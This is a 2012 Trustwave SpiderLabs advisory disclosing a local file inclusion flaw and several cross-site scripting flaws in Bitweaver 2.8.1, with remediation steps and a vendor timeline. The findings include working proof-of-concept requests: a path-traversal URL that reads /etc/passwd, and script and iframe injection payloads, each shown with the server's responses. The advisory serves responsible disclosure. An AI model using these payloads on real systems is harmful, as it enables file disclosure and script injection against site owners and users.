253 lines
No EOL
8.6 KiB
Text
253 lines
No EOL
8.6 KiB
Text
Trustwave SpiderLabs Security Advisory TWSL2012-016:
|
|
Multiple Vulnerabilities in Bitweaver
|
|
|
|
Published: 10/23/2012
|
|
Version: 1.0
|
|
|
|
Vendor: Bitweaver (http://www.bitweaver.org/)
|
|
Product: Bitweaver
|
|
Version affected: 2.8.1 and earlier versions
|
|
|
|
Product description:
|
|
Bitweaver is a free and open source web application framework and content
|
|
management system. Bitweaver is written in PHP and uses Firebird as a
|
|
database backend.
|
|
|
|
Credit: David Aaron and Jonathan Claudius of Trustwave SpiderLabs
|
|
|
|
Finding 1: Local File Inclusion Vulnerability
|
|
CVE: CVE-2012-5192
|
|
|
|
The 'overlay_type' parameter in the 'gmap/view_overlay.php' page in
|
|
Bitweaver is vulnerable to a local file inclusion vulnerability.
|
|
|
|
This vulnerability can be demonstrated by traversing to a known readable
|
|
path on the web server file system.
|
|
|
|
Example:
|
|
|
|
Performing LFI on 'overlay_type' parameter
|
|
|
|
#Request
|
|
|
|
http://A.B.C.D/bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00
|
|
|
|
#Response
|
|
|
|
root:x:0:0:root:/root:/bin/bash
|
|
<snip>
|
|
|
|
Finding 2: Multiple XSS Vulnerabilities in Bitweaver
|
|
CVE: CVE-2012-5193
|
|
|
|
Multiple cross-site scripting (XSS) vulnerabilities have been discovered
|
|
that allow remote unauthenticated users to run arbitrary scripts on the
|
|
system.
|
|
|
|
Example:
|
|
|
|
The following Proof of Concepts illustrate that Bitweaver 2.8.1 is
|
|
vulnerable to XSS.
|
|
|
|
Example(s):
|
|
|
|
1. Performing XSS on stats/index.php
|
|
|
|
#Request
|
|
|
|
GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0
|
|
|
|
#Response
|
|
|
|
HTTP/1.1 200 OK
|
|
Date: Tue, 17 Apr 2012 15:42:34 GMT
|
|
Server: Apache/2.2.20 (Ubuntu)
|
|
X-Powered-By: PHP/5.3.6-13ubuntu3.6
|
|
Set-Cookie: BWSESSION=4gmfnd86ahtvn34v5oejgivvh3; path=/bitweaver/
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
|
Pragma: no-cache
|
|
Vary: Accept-Encoding
|
|
Connection: close
|
|
Content-Type: text/html; charset=utf-8
|
|
[truncated due to length]
|
|
|
|
2. Performing XSS on /newsletters/edition.php
|
|
|
|
#Request
|
|
|
|
GET /bitweaver/newsletters/edition.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0
|
|
|
|
#Response
|
|
|
|
HTTP/1.1 200 OK
|
|
Date: Tue, 17 Apr 2012 15:42:02 GMT
|
|
Server: Apache/2.2.20 (Ubuntu)
|
|
X-Powered-By: PHP/5.3.6-13ubuntu3.6
|
|
Set-Cookie: BWSESSION=ajdjp797r7atral75rmlhcgs63; path=/bitweaver/
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
|
Pragma: no-cache
|
|
Vary: Accept-Encoding
|
|
Connection: close
|
|
Content-Type: text/html; charset=utf-8
|
|
[truncated due to length]
|
|
|
|
3. Performing XSS on the 'username' parameter available on /users/
|
|
|
|
#Request
|
|
|
|
POST /bitweaver/users/remind_password.php HTTP/1.1
|
|
Host: A.B.C.D
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 192
|
|
|
|
username=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&remind=Reset+%28password%29
|
|
|
|
#Response
|
|
|
|
HTTP/1.1 200 OK
|
|
Date: Tue, 17 Apr 2012 15:53:11 GMT
|
|
Server: Apache/2.2.20 (Ubuntu)
|
|
X-Powered-By: PHP/5.3.6-13ubuntu3.6
|
|
Set-Cookie: BWSESSION=i0ktqmt3497thag552t9ds78v4; path=/bitweaver/
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
|
Pragma: no-cache
|
|
Vary: Accept-Encoding
|
|
Content-Type: text/html; charset=utf-8
|
|
Content-Length: 15974
|
|
[truncated due to length]
|
|
|
|
<snip>
|
|
Invalid or unknown username: ">alert('XSS');</p></div>Please follow the instructions in the email.
|
|
<snip>
|
|
|
|
4. Performing XSS on the 'days' parameter on /stats/index.php
|
|
|
|
#Request
|
|
|
|
POST /bitweaver/stats/index.php HTTP/1.1
|
|
Host: A.B.C.D
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 177
|
|
|
|
days=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&pv_chart=Display
|
|
|
|
#Response
|
|
HTTP/1.1 200 OK
|
|
Date: Tue, 17 Apr 2012 15:55:53 GMT
|
|
Server: Apache/2.2.20 (Ubuntu)
|
|
X-Powered-By: PHP/5.3.6-13ubuntu3.6
|
|
Set-Cookie: BWSESSION=dqdvcnmql8jhngp0tphseh1qh4; path=/bitweaver/
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
|
Pragma: no-cache
|
|
Vary: Accept-Encoding
|
|
Content-Type: text/html; charset=utf-8
|
|
Content-Length: 24778
|
|
[truncated due to length]
|
|
|
|
<snip>
|
|
<img src="/stats/pv_chart.php?days="><script>alert('XSS');</script>" alt="Site Usage Statistics" />
|
|
<snip>
|
|
|
|
5. Performing XSS on the 'login' parameter on /users/register.php. (try
|
|
entering "><IFRAME src="https://www.trustwave.com" height="1000px"
|
|
width="1000px"> into the "Username field"):
|
|
|
|
http://A.B.C.D/bitweaver/users/register.php
|
|
|
|
|
|
6. Performing XSS on the 'highlight' parameter:
|
|
|
|
#Request
|
|
|
|
GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert('XSS')%253B%253C%252Fscript%253E HTTP/1.0
|
|
|
|
#Response
|
|
|
|
HTTP/1.1 200 OK
|
|
Date: Tue, 17 Apr 2012 15:59:09 GMT
|
|
Server: Apache/2.2.20 (Ubuntu)
|
|
X-Powered-By: PHP/5.3.6-13ubuntu3.6
|
|
Set-Cookie: BWSESSION=ama93jqlojmi385plkft5opl64; path=/bitweaver/
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
|
Pragma: no-cache
|
|
Vary: Accept-Encoding
|
|
Connection: close
|
|
Content-Type: text/html; charset=utf-8
|
|
[truncated due to length]
|
|
|
|
Remediation Steps:
|
|
The vendor has released a fix to address the Local File Inclusion
|
|
vulnerability (finding 1) and several of the Cross-Site Scripting
|
|
vulnerabilities (finding 2) in Bitweaver 3.1. However, additional fixes for
|
|
the Cross-site Scripting vulnerabilities were made on commit c3bef6f in the
|
|
development branch. Users are recommended to download the latest release
|
|
of Bitweaver on http://github.com/bitweaver to address the above issues.
|
|
|
|
These issue can also be mitigated with the use of technologies, such as Web
|
|
Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Often,
|
|
Vulnerability Scanners and Intrusion Detection Systems (IDS) can detect the
|
|
presence of Local File Inclusion vulnerabilities and XSS. Trustwave
|
|
technologies that address this issue include the following.
|
|
|
|
ModSecurity (http://www.modsecurity.org/) has added rules to the commercial
|
|
rules feed for these issues, available as part of the SpiderLabs
|
|
ModSecurity rules feed.
|
|
|
|
Trustwave's vulnerability scanning solution, TrustKeeper
|
|
(https://www.trustwave.com/trustKeeper.php), has been updated to detect
|
|
affected versions.
|
|
|
|
References
|
|
http://www.bitweaver.org/
|
|
http://blog.spiderlabs.com/
|
|
|
|
Vendor Communication Timeline:
|
|
04/26/12 - Initial communications with vendor
|
|
05/14/12 - Vulnerability disclosed to vendor
|
|
05/30/12 - Vendor acknowledges version 3.0 fixes issues
|
|
06/07/12 - Contact vendor regarding incomplete fixes in 3.0
|
|
09/07/12 - Vendor publishes version 3.1
|
|
10/10/12 - Contact vendor regarding incomplete fixes in 3.1
|
|
10/23/12 - Advisory published
|
|
|
|
About Trustwave:
|
|
Trustwave is the leading provider of on-demand and subscription-based
|
|
information security and payment card industry compliance management
|
|
solutions to businesses and government entities throughout the world. For
|
|
organizations faced with today's challenging data security and compliance
|
|
environment, Trustwave provides a unique approach with comprehensive
|
|
solutions that include its flagship TrustKeeper compliance management
|
|
software and other proprietary security solutions. Trustwave has helped
|
|
thousands of organizations--ranging from Fortune 500 businesses and large
|
|
financial institutions to small and medium-sized retailers--manage
|
|
compliance and secure their network infrastructure, data communications and
|
|
critical information assets. Trustwave is headquartered in Chicago with
|
|
offices throughout North America, South America, Europe, Africa, China and
|
|
Australia. For more information, visit https://www.trustwave.com
|
|
|
|
About Trustwave SpiderLabs:
|
|
SpiderLabs(R) is the advanced security team at Trustwave focused on
|
|
application security, incident response, penetration testing, physical
|
|
security and security research. The team has performed over a thousand
|
|
incident investigations, thousands of penetration tests and hundreds of
|
|
application security tests globally. In addition, the SpiderLabs Research
|
|
team provides intelligence through bleeding-edge research and proof of
|
|
concept tool development to enhance Trustwave's products and services.
|
|
https://www.trustwave.com/spiderlabs
|
|
|
|
Disclaimer:
|
|
The information provided in this advisory is provided "as is" without
|
|
warranty of any kind. Trustwave disclaims all warranties, either express or
|
|
implied, including the warranties of merchantability and fitness for a
|
|
particular purpose. In no event shall Trustwave or its suppliers be liable
|
|
for any damages whatsoever including direct, indirect, incidental,
|
|
consequential, loss of business profits or special damages, even if
|
|
Trustwave or its suppliers have been advised of the possibility of such
|
|
damages. Some states do not allow the exclusion or limitation of liability
|
|
for consequential or incidental damages so the foregoing limitation may not
|
|
apply. |